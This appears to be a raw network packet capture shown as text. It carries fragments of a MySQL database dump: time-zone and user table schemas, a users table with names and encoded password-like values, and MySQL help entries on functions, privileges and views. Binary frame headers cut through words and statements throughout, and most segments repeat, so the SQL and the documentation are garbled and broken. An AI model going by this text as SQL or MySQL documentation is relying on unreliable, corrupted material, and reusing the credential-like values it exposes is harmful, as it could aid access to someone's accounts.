CREATE TABLE `time_zone` ( `Time_zone_id` int(10) unsigned NOT NULL auto_increment, `Use_leap_seconds` enum('Y','N') NOT NULL default 'N', PRIMARY KEY (`Time_zone_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zones'; -- -- Dumping data for table `time_zone` -- /*!40000 ALTER TABLE `time_zone` DISABLE KEYS */; LOCK TABLES `time_zone` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone` ENABLE KEYS */; -- -- Table structure for table `time_zone_leap_second` -- DROP TABLE IF EXISTS `time_zone_leap_second`; CREATE TABLE `time_zone_leap_second` ( `Transition_time` bigint(20) NOT NULL default '0', `Correction` int(11) NOT NULL default '0', PRIMARY KEY (`Transition_time`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Leap seconds information for time zones'; -- -- Dumping data for table `time_zone_leap_second` -- /*!40000 ALTER TABLE `time_zone_leap_second` DISABLE KEYS */; LOCK TABLES `time_zone_leap_second` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone_leap_second` ENABLE KEYS */; -- -- Table structure for table `time_zone_name` -- DROP TABLE IF EXISTS `time_zone_name`; CREATE TABLE `time_zone_name` ( `Name` char(64) NOT NULL default '', `Time_zone_id` int(10) uC\}bbBi0`ET@/p܂Ao0E<]@?L  3PX屟tڀ   )nsigned NOT NULL default '0', PRIMARY KEY (`Name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone names'; -- -- Dumping data for table `time_zone_name` -- /*!40000 ALTER TABLE `time_zone_name` DISABLE KEYS */; LOCK TABLES `time_zone_name` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone_name` ENABLE KEYS */; -- -- Table structure for table `time_zone_transition` -- DROP TABLE IF EXISTS `time_zone_transition`; CREATE TABLE `time_zone_transition` ( `Time_zone_id` int(10) unsigned NOT NULL default '0', `Transition_time` bigint(20) NOT NULL default '0', `Transition_type_id` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`Time_zone_id`,`Transition_time`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone transitions'; -- -- Dumping data for table `time_zone_transition` -- /*!40000 ALTER TABLE `time_zone_transition` DISABLE KEYS */; LOCK TABLES `time_zone_transition` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone_transition` ENABLE KEYS */; -- -- Table structure for table `time_zone_transition_type` -- DROP TABLE IF EXISTS `time_zone_transition_type`; CREATE TABLE `time_zone_transition_type` ( `Time_zone_id` int(10) unsigned NOT NULL default '0', `Transition_type_id` int(10) unsigned NOT NULL default '0', `Offset` iCf}ZZBi0`EL@/܂Sŀo0E4@? 3 Pb켋)X )،C~}bb0`BiET@/Ԁo0SE<]@@K  3PX屟tڀ   )nsigned NOT NULL default '0', PRIMARY KEY (`Name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone names'; -- -- Dumping data for table `time_zone_name` -- /*!40000 ALTER TABLE `time_zone_name` DISABLE KEYS */; LOCK TABLES `time_zone_name` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone_name` ENABLE KEYS */; -- -- Table structure for table `time_zone_transition` -- DROP TABLE IF EXISTS `time_zone_transition`; CREATE TABLE `time_zone_transition` ( `Time_zone_id` int(10) unsigned NOT NULL default '0', `Transition_time` bigint(20) NOT NULL default '0', `Transition_type_id` int(10) unsigned NOT NULL default '0', PRIMARY KEY (`Time_zone_id`,`Transition_time`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone transitions'; -- -- Dumping data for table `time_zone_transition` -- /*!40000 ALTER TABLE `time_zone_transition` DISABLE KEYS */; LOCK TABLES `time_zone_transition` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone_transition` ENABLE KEYS */; -- -- Table structure for table `time_zone_transition_type` -- DROP TABLE IF EXISTS `time_zone_transition_type`; CREATE TABLE `time_zone_transition_type` ( `Time_zone_id` int(10) unsigned NOT NULL default '0', `Transition_type_id` int(10) unsigned NOT NULL default '0', `Offset` iC}ZZ0`BiEL@/go0AE4@@ 3 Pb켋)X )،CPbbBi0`ET@/أ  o0E< @?{  3PZ{ 2 `)\Rh9p4k9Rw=='),(218,'klfibe','MTNzExEIADZNQELZDv7XD4IN3t7xT//WyJc+RQ=='),(219,'srpkmz','MTNzExEIADfxUdVEoxd1DdvZDjJJDhTJYW8n4g=='),(220,'ynjmet','MTNzExEIADjKrosS2yN2epar2U78OCsaz7MeqQ=='),(221,'eiurvi','MTNzExEIADk9enMlKEkAa70kbRRJzmUuAm7sAQ=='),(222,'cybfyb','MTNzExEIADoQUVjti0DIPb+DV5r43yc51PddDA=='),(223,'gazmyj','MTNzExEIADtp7E2ptMgNYWdrRMByFZ7SaxLKpg=='),(224,'kxktiv','MTNzExEIADy0hmi8iKY1FPIw4dAA8dXeb6zFuA=='),(225,'bnctsz','MTNzExEIAD0xJ8rxT7joMFyaWXR0rnFmqhvWfQ=='); UNLOCK TABLES; /*!40000 ALTER TABLE `users` ENABLE KEYS */; -- -- Current Database: `del` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `del` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `del`; -- -- Table structure for table `test` -- DROP TABLE IF EXISTS `test`; CREATE TABLE `test` ( `id` int(32) default NULL, `name` text ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `test` -- /*!40000 ALTER TABLE `test` DISABLE KEYS */; LOCK TABLES `test` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `test` ENABLE KEYS */; -- -- Current Database: `deleteme` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `deleteme` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `deleteme`; -- -- Current Database: `mysql` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `mysql` /*!40100 DEFAULT CHARACTERCnbb0`BiET@/Ԁo0SE< @@{  3PZ{ 2 `)\Rh9p4k9Rw=='),(218,'klfibe','MTNzExEIADZNQELZDv7XD4IN3t7xT//WyJc+RQ=='),(219,'srpkmz','MTNzExEIADfxUdVEoxd1DdvZDjJJDhTJYW8n4g=='),(220,'ynjmet','MTNzExEIADjKrosS2yN2epar2U78OCsaz7MeqQ=='),(221,'eiurvi','MTNzExEIADk9enMlKEkAa70kbRRJzmUuAm7sAQ=='),(222,'cybfyb','MTNzExEIADoQUVjti0DIPb+DV5r43yc51PddDA=='),(223,'gazmyj','MTNzExEIADtp7E2ptMgNYWdrRMByFZ7SaxLKpg=='),(224,'kxktiv','MTNzExEIADy0hmi8iKY1FPIw4dAA8dXeb6zFuA=='),(225,'bnctsz','MTNzExEIAD0xJ8rxT7joMFyaWXR0rnFmqhvWfQ=='); UNLOCK TABLES; /*!40000 ALTER TABLE `users` ENABLE KEYS */; -- -- Current Database: `del` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `del` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `del`; -- -- Table structure for table `test` -- DROP TABLE IF EXISTS `test`; CREATE TABLE `test` ( `id` int(32) default NULL, `name` text ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `test` -- /*!40000 ALTER TABLE `test` DISABLE KEYS */; LOCK TABLES `test` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `test` ENABLE KEYS */; -- -- Current Database: `deleteme` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `deleteme` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `deleteme`; -- -- Current Database: `mysql` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `mysql` /*!40100 DEFAULT CHARACTERCbbBi0`ET@/p܂Ao0E<^@?L  3PX깟tڀ M  )nt(11) NOT NULL default '0', `Is_DST` tinyint(3) unsigned NOT NULL default '0', `Abbreviation` char(8) NOT NULL default '', PRIMARY KEY (`Time_zone_id`,`Transition_type_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone transition types'; -- -- Dumping data for table `time_zone_transition_type` -- /*!40000 ALTER TABLE `time_zone_transition_type` DISABLE KEYS */; LOCK TABLES `time_zone_transition_type` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone_transition_type` ENABLE KEYS */; -- -- Table structure for table `user` -- DROP TABLE IF EXISTS `user`; CREATE TABLE `user` ( `Host` varchar(60) character set latin1 collate latin1_bin NOT NULL default '', `User` varchar(16) character set latin1 collate latin1_bin NOT NULL default '', `Password` varchar(41) character set utf8 collate utf8_bin NOT NULL default '', `Select_priv` enum('N','Y') NOT NULL default 'N', `Insert_priv` enum('N','Y') NOT NULL default 'N', `Update_priv` enum('N','Y') NOT NULL default 'N', `Delete_priv` enum('N','Y') NOT NULL default 'N', `Create_priv` enum('N','Y') NOT NULL default 'N', `Drop_priv` enum('N','Y') NOT NULL default 'N', `Reload_priv` enum('N','Y') NOT NULL default 'N', `Shutdown_priv` enum('N','Y') NOT NULL default 'N', `Process_priv` enCʁZZBi0`EL@/܂Sŀo0E4@? 3 Pb켖 )D )܌Cbb0`BiET@/Ԁo0SE<^@@K  3PX깟tڀ M  )nt(11) NOT NULL default '0', `Is_DST` tinyint(3) unsigned NOT NULL default '0', `Abbreviation` char(8) NOT NULL default '', PRIMARY KEY (`Time_zone_id`,`Transition_type_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone transition types'; -- -- Dumping data for table `time_zone_transition_type` -- /*!40000 ALTER TABLE `time_zone_transition_type` DISABLE KEYS */; LOCK TABLES `time_zone_transition_type` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone_transition_type` ENABLE KEYS */; -- -- Table structure for table `user` -- DROP TABLE IF EXISTS `user`; CREATE TABLE `user` ( `Host` varchar(60) character set latin1 collate latin1_bin NOT NULL default '', `User` varchar(16) character set latin1 collate latin1_bin NOT NULL default '', `Password` varchar(41) character set utf8 collate utf8_bin NOT NULL default '', `Select_priv` enum('N','Y') NOT NULL default 'N', `Insert_priv` enum('N','Y') NOT NULL default 'N', `Update_priv` enum('N','Y') NOT NULL default 'N', `Delete_priv` enum('N','Y') NOT NULL default 'N', `Create_priv` enum('N','Y') NOT NULL default 'N', `Drop_priv` enum('N','Y') NOT NULL default 'N', `Reload_priv` enum('N','Y') NOT NULL default 'N', `Shutdown_priv` enum('N','Y') NOT NULL default 'N', `Process_priv` enCZZ0`BiEL@/go0AE4@@ 3 Pb켖 )D )܌C%bbBi0`ET@/p܂Ao0E<@?  3PףN   )DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysql> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8',''),(349,'INET_NTOA',21,' INET_NTOA(expr)\nGiven a numeric network address (4 or 8 byte), returns the dotted-quad\nrepresentation of the address as a string.\n','mysql> SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThC@bb0`BiET@/Ԁo0SE<@@  3PףN   )DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysql> SELECT BIT_COUNT(29);\n -> 4',''),(347,'UTC_TIMESTAMP',14,' UTC_TIMESTAMP\n UTC_TIMESTAMP()\nReturns the current UTC date and time as a value in \'YYYY-MM-DD HH:MM:SS\'\nor YYYYMMDDHHMMSS format, depending on whether the function is used in\na string or numeric context.\n','mysql> SELECT UTC_TIMESTAMP(), UTC_TIMESTAMP() + 0;\n -> \'2003-08-14 18:08:04\', 20030814180804',''),(348,'+',4,' +\nAddition:\n','mysql> SELECT 3+5;\n -> 8',''),(349,'INET_NTOA',21,' INET_NTOA(expr)\nGiven a numeric network address (4 or 8 byte), returns the dotted-quad\nrepresentation of the address as a string.\n','mysql> SELECT INET_NTOA(3520061480);\n -> \'209.207.224.40\'',''),(350,'ACOS',4,' ACOS(X)\nReturns the arc cosine of X, that is, the value whose cosine is\nX. Returns NULL if X is not in the range -1 to\n1.\n','mysql> SELECT ACOS(1);\n -> 0.000000\nmysql> SELECT ACOS(1.0001);\n -> NULL\nmysql> SELECT ACOS(0);\n -> 1.570796',''),(351,'ISOLATION',10,'SET [GLOBAL | SESSION] TRANSACTION ISOLATION LEVEL\n{ READ UNCOMMITTED | READ COMMITTED | REPEATABLE READ | SERIALIZABLE }\n\nThCbbBi0`ET@/p܂Ao0E<@?  3PרV   )is statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transaction level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each InnoDB transaction isolation level, see\n[InnoDB transaction isolation, InnoDB transaction isolation].\nInnoDB supports each of these levels\nfrom MySQL 4.0.5 on. The default level is REPEATABLE READ.\n\nYou can set the initial default global isolation level for mysqld with\nthe --transaction-isolation option.\nSee also : [Server options].\n','',''),(352,'CEILING',4,' CEILING(X)\n CEIL(X)\nReturns the smallest integer value not less than X.\n','mysql> SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',CZZBi0`EL@/܂Sŀo0E4@? 3 Pb켠)y3 )܌Cbb0`BiET@/Ԁo0SE<@@  3PרV   )is statement\nsets the transaction isolation level for the next transaction, globally, or\nfor the current session.\n\nThe default behavior of SET TRANSACTION is to set the isolation level\nfor the next (not yet\nstarted) transaction. If you use the GLOBAL keyword, the statement\nsets the default transaction level globally for all new connections\ncreated from that point on. Existing connections are unaffected.\nYou need the SUPER\nprivilege to do this. Using the SESSION keyword sets the\ndefault transaction level for all future transactions performed on the\ncurrent connection.\n\nFor descriptions of each InnoDB transaction isolation level, see\n[InnoDB transaction isolation, InnoDB transaction isolation].\nInnoDB supports each of these levels\nfrom MySQL 4.0.5 on. The default level is REPEATABLE READ.\n\nYou can set the initial default global isolation level for mysqld with\nthe --transaction-isolation option.\nSee also : [Server options].\n','',''),(352,'CEILING',4,' CEILING(X)\n CEIL(X)\nReturns the smallest integer value not less than X.\n','mysql> SELECT CEILING(1.23);\n -> 2\nmysql> SELECT CEIL(-1.23);\n -> -1',''),(353,'SIN',4,' SIN(X)\nReturns the sine of X, where X is given in radians.\n','mysql> SELECT SIN(PI());\n -> 0.000000',CZZ0`BiEL@/go0AE4@@ 3 Pb켠)y3 )܌CbbBi0`ET@/p܂Ao0E<@?  3P׭^ Xz  )''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nthe geometry instance g is a member.\nThe name corresponds to one of the instantiable Geometry subclasses.\n','mysql> SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+',''),(357,'GRANT TYPES',7,'For the GRANT and REVOKE statements, priv_type can be\nspecified as any of the following:\n\n Privilege Meaning\n ALL [PRIVILEGES] Sets all simple privileges except GRANT OPTION\n ALTER Allows use of ALTER TABLE\n ALTER ROUTINE Alter or drop stored routines\n CREATE Allows use of CREATE TABLE\n CREATE ROUTINE Create stCbb0`BiET@/Ԁo0SE<@@  3P׭^ Xz  )''),(354,'DAYOFWEEK',14,' DAYOFWEEK(date)\nReturns the weekday index\nfor date (1 = Sunday, 2 = Monday, ..., 7 =\nSaturday). These index values correspond to the ODBC standard.\n','mysql> SELECT DAYOFWEEK(\'1998-02-03\');\n -> 3',''),(355,'LINEFROMWKB',13,' LineFromWKB(wkb[,srid])\n LineStringFromWKB(wkb[,srid])\nConstructs a LINESTRING value using its WKB representation and SRID.\n','',''),(356,'GEOMETRYTYPE',19,' GeometryType(g)\nReturns as a string the name of the geometry type of which\nthe geometry instance g is a member.\nThe name corresponds to one of the instantiable Geometry subclasses.\n','mysql> SELECT GeometryType(GeomFromText(\'POINT(1 1)\'));\n+------------------------------------------+\n| GeometryType(GeomFromText(\'POINT(1 1)\')) |\n+------------------------------------------+\n| POINT |\n+------------------------------------------+',''),(357,'GRANT TYPES',7,'For the GRANT and REVOKE statements, priv_type can be\nspecified as any of the following:\n\n Privilege Meaning\n ALL [PRIVILEGES] Sets all simple privileges except GRANT OPTION\n ALTER Allows use of ALTER TABLE\n ALTER ROUTINE Alter or drop stored routines\n CREATE Allows use of CREATE TABLE\n CREATE ROUTINE Create stCLbbBi0`ET@/p܂Ao0E<@?  3Pײf   )ored routines\n CREATE TEMPORARY TABLES Allows use of CREATE TEMPORARY TABLE\n CREATE USER Allows use of CREATE USER, DROP USER, RENAME USER, and REVOKE ALL PRIVILEGES.\n CREATE VIEW Allows use of CREATE VIEW\n DELETE Allows use of DELETE\n DROP Allows use of DROP TABLE\n EXECUTE Allows the user to run stored routines\n FILE Allows use of SELECT ... INTO OUTFILE and LOAD DATA INFILE\n INDEX Allows use of CREATE INDEX and DROP INDEX\n INSERT Allows use of INSERT\n LOCK TABLES Allows use of LOCK TABLES on tables for which you have the SELECT privilege\n PROCESS Allows use of SHOW FULL PROCESSLIST\n REFERENCES Not implemented\n RELOAD Allows use of FLUSH\n REPLICATION CLIENT Allows the user to ask where slave or master servers are\n REPLICATION SLAVE Needed for replication slaves (to read binary log events from the master)\n SELECT Allows use of SELECT\n SHOW DATABASES SHOW DATABASES shows all databases\n SHOW VIEW Allows use of SHOW CREATE VIEW\n SHUTDOWN Allows use of mysqladmin shutdown\n SUPER Allows use of CHANGE MASTER, KILL,\nPURGE MASTER LOGS, and SET GLOBAL statements, the mysqladmin debug command; allows you to connect (once) even if max_connections is reached\n UPDATE Allows usCfbb0`BiET@/Ԁo0SE<@@  3Pײf   )ored routines\n CREATE TEMPORARY TABLES Allows use of CREATE TEMPORARY TABLE\n CREATE USER Allows use of CREATE USER, DROP USER, RENAME USER, and REVOKE ALL PRIVILEGES.\n CREATE VIEW Allows use of CREATE VIEW\n DELETE Allows use of DELETE\n DROP Allows use of DROP TABLE\n EXECUTE Allows the user to run stored routines\n FILE Allows use of SELECT ... INTO OUTFILE and LOAD DATA INFILE\n INDEX Allows use of CREATE INDEX and DROP INDEX\n INSERT Allows use of INSERT\n LOCK TABLES Allows use of LOCK TABLES on tables for which you have the SELECT privilege\n PROCESS Allows use of SHOW FULL PROCESSLIST\n REFERENCES Not implemented\n RELOAD Allows use of FLUSH\n REPLICATION CLIENT Allows the user to ask where slave or master servers are\n REPLICATION SLAVE Needed for replication slaves (to read binary log events from the master)\n SELECT Allows use of SELECT\n SHOW DATABASES SHOW DATABASES shows all databases\n SHOW VIEW Allows use of SHOW CREATE VIEW\n SHUTDOWN Allows use of mysqladmin shutdown\n SUPER Allows use of CHANGE MASTER, KILL,\nPURGE MASTER LOGS, and SET GLOBAL statements, the mysqladmin debug command; allows you to connect (once) even if max_connections is reached\n UPDATE Allows usC3bbBi0`ET@/p܂Ao0E<@?  3P׷n   )e of UPDATE\n USAGE Synonym for ``no privileges\'\'\n GRANT OPTION Allows privileges to be granted\n \n','',''),(358,'CREATE VIEW',24,'This statement creates a new view, or replaces an existing one if the\nOR REPLACE clause is given. The select_statement is a\nSELECT statement that provides the definition of the view.\nThe statement can select from base tables or other views.\n\nThis statement requires the CREATE VIEW privilege for the view, and\nsome privilege for each column selected by the SELECT statement.\nFor columns used elsewhere in the SELECT statement you must have\nthe SELECT privilege. If the OR REPLACE clause is present,\nyou must also have the DELETE privilege for the view.\n\nA view belongs to a database. By default, a new view is created in the\ncurrent database. To create the view explicitly in a given database,\nspecify the name as db_name.view_name when you create it.\n\nmysql> CREATE VIEW test.v AS SELECT * FROM t;\n\nTables and views share the same namespace within a database, so a database\ncannot contain a table and a view that have the same name.\n\nViews must have unique column names with no duplicates, just like base\ntables. By default, the names of the columns retrieved by the SELECT\nstatement are used for the view column nameC<ZZBi0`EL@/܂Sŀo0E4@? 3 Pb켪*)o  )CTbb0`BiET@/Ԁo0SE<@@  3P׷n   )e of UPDATE\n USAGE Synonym for ``no privileges\'\'\n GRANT OPTION Allows privileges to be granted\n \n','',''),(358,'CREATE VIEW',24,'This statement creates a new view, or replaces an existing one if the\nOR REPLACE clause is given. The select_statement is a\nSELECT statement that provides the definition of the view.\nThe statement can select from base tables or other views.\n\nThis statement requires the CREATE VIEW privilege for the view, and\nsome privilege for each column selected by the SELECT statement.\nFor columns used elsewhere in the SELECT statement you must have\nthe SELECT privilege. If the OR REPLACE clause is present,\nyou must also have the DELETE privilege for the view.\n\nA view belongs to a database. By default, a new view is created in the\ncurrent database. To create the view explicitly in a given database,\nspecify the name as db_name.view_name when you create it.\n\nmysql> CREATE VIEW test.v AS SELECT * FROM t;\n\nTables and views share the same namespace within a database, so a database\ncannot contain a table and a view that have the same name.\n\nViews must have unique column names with no duplicates, just like base\ntables. By default, the names of the columns retrieved by the SELECT\nstatement are used for the view column nameCfZZ0`BiEL@/go0AE4@@ 3 Pb켪*)o  )CbbBi0`ET@/p܂Ao0E<@?  3P׼v ȕ  )s. To define explicit names for\nthe view columns, the optional column_list clause can be given as a\nlist of comma-separated identifiers. The number of names in\ncolumn_list must be the same as the number of columns retrieved by the\nSELECT statement.\n\nColumns retrieved by the SELECT statement can be simple references to\ntable columns. They can also be expressions that use functions, constant\nvalues, operators, and so forth.\n\nUnqualified table or view names in the SELECT statement are\ninterpreted with respect to the default database. A view can refer to\ntables or views in other databases by qualifying the table or view name with\nthe proper database name.\n\nA view can be created from many kinds of SELECT statements. It can\nrefer to base tables or other views. It can use joins, UNION, and\nsubqueries. The SELECT need not even refer to any tables. The\nfollowing example defines a view that selects two columns from another\ntable, as well as an expression calculated from those columns:\n\nmysql> CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50CZZBi0`EL@/Ao0E4B@?J  *P&% CREATE TABLE t (qty INT, price INT);\nmysql> INSERT INTO t VALUES(3, 50);\nmysql> CREATE VIEW v AS SELECT qty, price, qty*price AS value FROM t;\nmysql> SELECT * FROM v;\n+------+-------+-------+\n| qty | price | value |\n+------+-------+-------+\n| 3 | 50CIZZ0`BiEL@/Eo0lE4B@@J  *P&% CREATE VIEW v AS SELECT CHARSET(CHAR(65)), COLLATION(CHAR(65));\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SET NAMES \'latin1\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| latin1 | latin1_swedish_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nmysql> SET NAMES \'utf8\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| utf8 | utf8_general_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nThe optional ALGORITHMCbb0`BiET@/Ԁo0SE<@@  3PƆ C  )select from the view using a statement that has its own\nLIMIT clause, it is undefined which limit applies. This same\nprinciple applies to options such as ALL, DISTINCT, or\nSQL_SMALL_RESULT that follow the SELECT keyword, and to\nclauses such as INTO, FOR UPDATE, LOCK IN SHARE MODE,\nand PROCEDURE.\n\nIf you create a view and then change the query processing environment by\nchanging system variables, that may affect the results you get from the\nview:\n\nmysql> CREATE VIEW v AS SELECT CHARSET(CHAR(65)), COLLATION(CHAR(65));\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SET NAMES \'latin1\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| latin1 | latin1_swedish_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nmysql> SET NAMES \'utf8\';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT * FROM v;\n+-------------------+---------------------+\n| CHARSET(CHAR(65)) | COLLATION(CHAR(65)) |\n+-------------------+---------------------+\n| utf8 | utf8_general_ci |\n+-------------------+---------------------+\n1 row in set (0.00 sec)\n\nThe optional ALGORITHMCZZZBi0`EL@/܂Sŀo0E4@? 3 Pb켴:)d )CtZZ0`BiEL@/go0AE4@@ 3 Pb켴:)d )CAbbBi0`ET@/p܂Ao0E<@?  3Pˎ   ) clause is a MySQL extension to standard SQL.\nALGORITHM takes three values: MERGE, TEMPTABLE, or\nUNDEFINED. The default algorithm is UNDEFINED if no\nALGORITHM clause is present. The algorithm affects how MySQL\nprocesses the view.\n\nFor MERGE, the text of a statement that refers to the view and the view\ndefinition are merged such that parts of the view definition replace\ncorresponding parts of the statement.\n\nFor TEMPTABLE, the results from the view are retrieved into a\ntemporary table, which then is used to execute the statement.\n\nFor UNDEFINED, MySQL chooses which algorithm to use. It prefers\nMERGE over TEMPTABLE if possible, because MERGE is\nusually more efficient and because a view cannot be updatable if a temporary\ntable is used.\n\nA reason to choose TEMPTABLE explicitly is that locks can be released\non underlying tables after the temporary table has been created and before\nit is used to finish processing the statement. This might result in quicker\nlock release than the MERGE algorithm so that other clients that use\nthe view are not blocked as long.\n\nA view algorithm can be UNDEFINED three ways:\n\n\n --- No ALGORITHM clause is present in the CREATE VIEW statement.\n\n --- The CREATE VIEW statement has an explicit ALGORITHM = UNDEFINED\nclC\bb0`BiET@/Ԁo0SE<@@  3Pˎ   ) clause is a MySQL extension to standard SQL.\nALGORITHM takes three values: MERGE, TEMPTABLE, or\nUNDEFINED. The default algorithm is UNDEFINED if no\nALGORITHM clause is present. The algorithm affects how MySQL\nprocesses the view.\n\nFor MERGE, the text of a statement that refers to the view and the view\ndefinition are merged such that parts of the view definition replace\ncorresponding parts of the statement.\n\nFor TEMPTABLE, the results from the view are retrieved into a\ntemporary table, which then is used to execute the statement.\n\nFor UNDEFINED, MySQL chooses which algorithm to use. It prefers\nMERGE over TEMPTABLE if possible, because MERGE is\nusually more efficient and because a view cannot be updatable if a temporary\ntable is used.\n\nA reason to choose TEMPTABLE explicitly is that locks can be released\non underlying tables after the temporary table has been created and before\nit is used to finish processing the statement. This might result in quicker\nlock release than the MERGE algorithm so that other clients that use\nthe view are not blocked as long.\n\nA view algorithm can be UNDEFINED three ways:\n\n\n --- No ALGORITHM clause is present in the CREATE VIEW statement.\n\n --- The CREATE VIEW statement has an explicit ALGORITHM = UNDEFINED\nclC5ZZBi0`EL@/܂Sŀo0E4@? 3 Pb켾J)Z )CNZZ0`BiEL@/go0AE4@@ 3 Pb켾J)Z )CbbBi0`ET@/p܂Ao0E<@?  3PЖ M  )ause.\n\n --- ALGORITHM = MERGE is specified for a view that can be processed only\nwith a temporary table. In this case, MySQL generates a warning and sets\nthe algorithm to UNDEFINED.\n\n\n\nAs mentioned earlier, MERGE is handled by merging corresponding parts\nof a view definition into the statement that refers to the view. The\nfollowing examples briefly illustrate how the MERGE algorithm works.\nThe examples assume that there is a view v_merge that has this\ndefinition:\n\nCREATE ALGORITHM = MERGE VIEW v_merge (vc1, vc2) AS\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 1: Suppose that we issue this statement:\n\nSELECT * FROM v_merge;\n\nMySQL handles the statement as follows:\n\n\n --- v_merge becomes t\n\n --- * becomes vc1, vc2, which corresponds to c1, c2\n\n --- The view WHERE clause is added\n\n\nThe resulting statement to be executed becomes:\n\nSELECT c1, c2 FROM t WHERE c3 > 100;\n\nExample 2: Suppose that we issue this statement:\n\nSELECT * FROM v_merge WHERE vc1 < 100;\n\nThis statement is handled similarly to the previous one, except that\nvc1 < 100 becomes c1 < 100 and the view WHERE clause is\nadded to the statement WHERE clause using an AND connective\n(and parentheses are added to make sure the parts of the clause are executed\nwith correct Cbb0`BiET@/Ԁo0SE<@@  